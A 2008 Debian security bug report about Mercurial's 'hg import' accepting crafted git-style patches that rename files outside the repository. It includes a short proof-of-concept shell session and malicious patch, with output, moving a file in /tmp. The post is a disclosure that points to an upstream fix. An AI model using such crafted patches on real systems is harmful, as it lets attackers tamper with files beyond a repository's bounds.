[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation

Steffen Joeris steffen.joeris at skolelinux.de
Mon Jun 30 07:42:05 UTC 2008


Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole

Hi

It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory

hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root

cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux


The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4





More information about the Secure-testing-team mailing list